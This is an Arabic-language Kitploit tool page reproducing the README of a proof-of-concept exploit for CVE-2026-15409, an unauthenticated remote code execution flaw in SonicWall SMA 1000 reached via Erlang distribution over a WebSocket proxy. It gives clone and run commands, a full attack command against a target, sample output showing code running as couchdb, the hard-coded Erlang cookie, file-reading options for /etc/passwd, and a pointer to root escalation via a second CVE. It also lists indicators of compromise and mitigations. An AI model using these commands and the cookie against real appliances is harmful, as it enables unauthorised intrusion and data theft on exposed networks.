Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-15409 — إثبات مفهوم لاستغلال CVE-2026-15409 (SonicWall SMA 1000 RCE) عبر توزيع Erlang عبر WebSocket. يحقق تنفيذًا عن بُعد للكود دون مصادقة كمستخدم couchdb. | Kitploit
أدوات/GitHubGitHub/ch4120n/cve-2026-15409
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتسريب البياناتما بعد الاستغلالاختبار الاختراقالفريق الأحمر
GitHubch4120n/cve-2026-15409

CVE-2026-15409

إثبات مفهوم لاستغلال CVE-2026-15409 (SonicWall SMA 1000 RCE) عبر توزيع Erlang عبر WebSocket. يحقق تنفيذًا عن بُعد للكود دون مصادقة كمستخدم couchdb.

عرض المستودع
13منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🚀 CVE-2026-15409 – ثغرة RCE في Erlang عبر WebSocket Proxy على أجهزة SonicWall SMA 1000

Python Exploit CVE

GitHub stars GitHub issues License

استغلال إثبات المفهوم لثغرة CVE-2026-15409 – تنفيذ تعليمات برمجية عن بُعد دون مصادقة على أجهزة سلسلة SonicWall SMA 1000 عبر بروتوكول توزيع Erlang الممرّر عبر WebSocket.


📖 نظرة عامة

CVE-2026-15409 هي ثغرة حرجة تؤثر على أجهزة SonicWall SMA 1000 (الإصدارات الأقدم من التحديث الإصلاحي الصادر في يونيو 2026). يكمن الخلل في خدمة WorkPlace (المعرّضة عادةً على المنفذ 443) والتي تمرّر اتصالات WebSocket إلى عقد Erlang الداخلية. من خلال تزوير معامل صالح واستخدام ملف تعريف ارتباط Erlang مضمّن، يمكن للمهاجم إنشاء قناة توزيع موثّقة وتنفيذ أوامر نظام تعسفية بصلاحية مستخدم (أو حسابات أخرى منخفضة الامتياز) عبر استدعاءات RPC إلى .

bmID
couchdb
os:cmd/1

يوفر هذا المستودع إثبات مفهوم (PoC) عمليًا بالكامل يؤتمت سلسلة الاستغلال بأكملها – من مصافحة WebSocket إلى تنفيذ الأوامر التعسفية – بواجهة نظيفة، ومعالجة متقدمة للأخطاء، وتسجيل أنيق.

🔍 الميزات الرئيسية

  • نفق WebSocket – يعمل مباشرةً عبر wss:// باستخدام نقطة نهاية wsproxy.
  • بروتوكول توزيع Erlang – ينفّذ المصافحة وتنسيق ETF (Erlang External Term Format) بالكامل.
  • تنفيذ التعليمات البرمجية عن بُعد – عبر os:cmd/1؛ يمكن قراءة الملفات عبر file:read_file/1 أو اختبار الاتصال باستخدام erlang:node/0.
  • كشف ذكي – يدعم قيم bmID التعسفية (طالما تبدأ بـ -3389) وقيم serviceType متعددة.
  • تسجيل شامل – رسائل ملوّنة برموز [+] و[*] و[-] و[!] لسهولة المراقبة.

🧬 تفاصيل الثغرة

تنبع الثغرة من نقاط الضعف التصميمية التالية في SMA 1000:

  1. تمرير WebSocket غير مقيد – تقوم نقطة نهاية /wsproxy بتمرير رسائل WebSocket الثنائية إلى منفذ توزيع Erlang المحلي (localhost:1050 افتراضيًا) دون مصادقة أو تفويض مناسب.
  2. ملف تعريف ارتباط Erlang مضمّن/قابل للتخمين – ملف تعريف الارتباط المستخدم لمصادقة التوزيع ثابت عبر جميع أجهزة SMA (على الأقل في الإصدار المختبر). يتيح ذلك لمهاجم خارجي إكمال المصافحة.
  3. عقدة Erlang مكشوفة – تستمع عقدة Erlang [email protected] على المنفذ 1050 وتقبل الاتصالات من وكيل WebSocket، ما يجعلها قابلة للوصول من الشبكة.
  4. واجهة RPC قوية – تقدّم عقدة Erlang خدمة rex القياسية، التي يمكنها تنفيذ دوال تعسفية على العقدة، بما في ذلك os:cmd/1.

الإصدارات المتأثرة

  • أجهزة سلسلة SonicWall SMA 1000 ذات البرنامج الثابت الأقدم من التحديث الإصلاحي الصادر في يونيو 2026 (مثل ex_sra_vm_12.5.0-02002.ova).
  • يجب أن تكون خدمة WorkPlace مفعّلة (الإعداد الافتراضي).

التأثير

  • تنفيذ التعليمات البرمجية عن بُعد بصلاحية مستخدم couchdb (UID 1010، مجموعة daemon).
  • تحرّك جانبي – يمكن للمهاجم استغلال CVE-2026-15410 (ثغرة اجتياز المسار في XML-RPC) لتصعيد الامتيازات إلى صلاحية الجذر.
  • سرقة البيانات – قراءة ملفات تعسفية عبر file:read_file/1.
  • الاستمرارية – تثبيت أبواب خلفية أو تعديل ملفات النظام.

🔧 متطلبات الاستغلال

  • وصول شبكي إلى خدمة WorkPlace على جهاز SMA (عادةً عبر TCP/443).
  • لا حاجة لبيانات اعتماد صالحة – يعمل الاستغلال دون مصادقة.
  • Python 3.8+ مع مكتبة websockets (التثبيت عبر pip install websockets).

🚀 الاستخدام

التثبيت

root@kitploit:~
git clone https://github.com/Ch4120N/CVE-2026-15409.git
cd CVE-2026-15409
pip install -r requirements.txt   # websockets

الأمر الأساسي

root@kitploit:~
python3 cve-2026-15409.py \
  --ws-url 'wss://TARGET_IP/wsproxy?bmID=-3389c1b25ccd&serviceType=SSH&host=0.0.0.0&port=1050' \
  --ws-user-agent 'SMA Connect Agent' \
  --ws-insecure-tls \
  --exec 'whoami && id && pwd && hostname'

مثال على المخرجات

root@kitploit:~
  ░█▀▀░█░█░█▀▀░░░░░▀▀▄░▄▀▄░▀▀▄░▄▀▀░░░░░▀█░░█▀▀░█░█░▄▀▄░▄▀▄
  ░█░░░▀▄▀░█▀▀░▄▄▄░▄▀░░█/█░▄▀░░█▀▄░▄▄▄░░█░░▀▀▄░░▀█░█/█░░▀█
  ░▀▀▀░░▀░░▀▀▀░░░░░▀▀▀░░▀░░▀▀▀░░▀░░░░░░▀▀▀░▀▀░░░░▀░░▀░░▀▀░
                    [CVE-2026-15409]
         Erlang Distribution RCE via WebSocket Proxy
                     Owner: Ch4120N

[ * ] Connecting via WebSocket to wss://192.168.56.102/wsproxy?bmID=-3389c1b25ccd&serviceType=SSH&host=0.0.0.0&port=1050
[ * ] Preparing RPC: os:cmd('whoami && id && pwd && hostname')
[ + ] Authenticated to [email protected]
[ * ] Calling os:cmd/1 ...
[ + ] RPC call completed
[ * ] Peer name: [email protected]
[ * ] Peer flags: 0xd07df7fbd
[ * ] Peer creation: 1784069352
[ + ] Command output:
couchdb
uid=1010(couchdb) gid=1(daemon) groups=1(daemon)
/opt/couchdb
SMAAppliance.sma

الخيارات المتقدمة

الوسيطالوصف
--host, --portاتصال احتياطي عبر TCP (إذا لم يُستخدم WebSocket)
--cookieتجاوز ملف تعريف الارتباط المضمّن الافتراضي
--nameاسم مخصص لعقدة Erlang المحلية
--ws-originتعيين ترويسة Origin لـ WebSocket
--ws-user-agentسلسلة User-Agent (الافتراضي: SMA Connect Agent)
--ws-insecure-tlsتعطيل التحقق من TLS (الشهادات ذاتية التوقيع)
--read-fileقراءة ملف من الهدف (مثل /etc/passwd)
--rpcاختبار الاتصال فقط عبر استدعاء erlang:node/0

🧪 تفاصيل تقنية للكشف والضبط

ملف تعريف الارتباط المضمّن

ملف تعريف ارتباط Erlang المستخدم في الاستغلال هو:

root@kitploit:~
10ecad5b446e86864832904cd439b6b70262

هذه القيمة ثابتة عبر جميع أجهزة SMA المختبرة وهي مضمّنة في عملية Erlang على localhost:1050. وهي ليست نفس ملف تعريف الارتباط الذي يكوّنه المستخدم للتجميع (clustering).

معامل bmID

يجب أن يبدأ bmID بـ -3389 (مثل -3389c1b25ccd). تُقبل القيم التعسفية بعد البادئة، لذا لا ينبغي أن يعتمد الكشف القائم على التواقيع على تجزئة ثابتة.

أنواع الخدمات

في حين يستخدم المثال serviceType=SSH، فإن قيمًا أخرى مثل TELNET تعمل أيضًا. الاستغلال غير مرتبط بنوع الخدمة.

اختيار المنفذ

المنفذ 1050 هو المنفذ الداخلي الافتراضي، ولكن لوحظ في الهجمات الفعلية استهداف المنفذ 8188 أيضًا. يمكن تكييف الاستغلال ليعمل مع أي منفذ يعرض بروتوكول توزيع Erlang.

تصعيد الامتيازات

بعد الحصول على شل بصلاحية couchdb، يمكن للمهاجم استغلال CVE-2026-15410 – وهي ثغرة اجتياز مسار في XML-RPC تتيح إزالة التحديث الإصلاحي ثم تصعيد الامتيازات إلى صلاحية الجذر.


🛡️ الكشف والتخفيف

مؤشرات الاختراق (IoCs)

  • اتصالات WebSocket غير معتادة إلى /wsproxy مع bmID يبدأ بـ -3389.
  • اتصالات صادرة غير متوقعة من جهاز SMA إلى عناوين IP خارجية.
  • عمليات تُطلق بواسطة مستخدم couchdb (مثل bash أو python أو nc).
  • تعديل أو إنشاء ملفات في /var/tmp/ بواسطة مستخدم couchdb.

الإجراءات الموصى بها

  1. تطبيق التصحيح الرسمي من SonicWall (التحديث الإصلاحي ليونيو 2026) فورًا.
  2. تقييد الوصول إلى خدمة WorkPlace على نطاقات IP موثوقة فقط.
  3. مراقبة السجلات بحثًا عن نشاط WebSocket شاذ ومحاولات توزيع Erlang.
  4. تغيير ملف تعريف ارتباط Erlang للعقدة الداخلية (إن أمكن) – على الرغم من أن ذلك قد يؤثر على وظائف التطبيق.
  5. تعطيل خدمة WorkPlace إذا لم تكن مطلوبة.

👏 الاعتمادات

  • الاكتشاف وإثبات المفهوم (PoC): Ch4120N.
  • أبحاث إضافية: SonicWall PSIRT ومجتمع الأمن الأوسع.

📄 الترخيص

هذا المشروع مرخّص بموجب رخصة MIT – راجع ملف LICENSE للتفاصيل.

إخلاء مسؤولية: هذه الأداة مخصّصة للأغراض التعليمية والاختبارات المصرّح بها فقط. المؤلف والمساهمون غير مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج.


📚 المراجع

  • النشرة الأمنية من SonicWall (CVE-2026-15409)
  • سجل NIST NVD – CVE-2026-15409

⭐ الدعم

إذا وجدت إثبات المفهوم هذا مفيدًا، فيرجى التفكير في منحه ⭐ على GitHub ومشاركته بمسؤولية. المساهمات والقضايا (issues) وطلبات السحب (pull requests) مرحّب بها!


استمتع بالاختراق! 🛡️

تنزيل الأداة